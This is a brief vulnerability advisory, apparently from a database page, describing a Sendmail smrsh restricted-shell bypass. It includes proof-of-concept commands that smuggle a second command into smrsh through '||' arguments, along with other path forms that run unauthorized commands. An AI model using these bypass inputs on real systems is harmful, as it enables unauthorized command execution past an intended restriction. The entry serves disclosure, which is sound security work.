|
Sendmail SMRSH Double Pipe Access Validation Vulnerability
$ echo "echo unauthorized execute" > /tmp/unauth $ smrsh -c ". || . /tmp/unauth || ." /bin/sh: /etc/smrsh/.: is a directory unauthorized execute OR one of the following types of commands: smrsh -c "/ command" smrsh -c "../ command" smrsh -c "./ command" smrsh -c "././ command" |
|
|
Privacy Statement |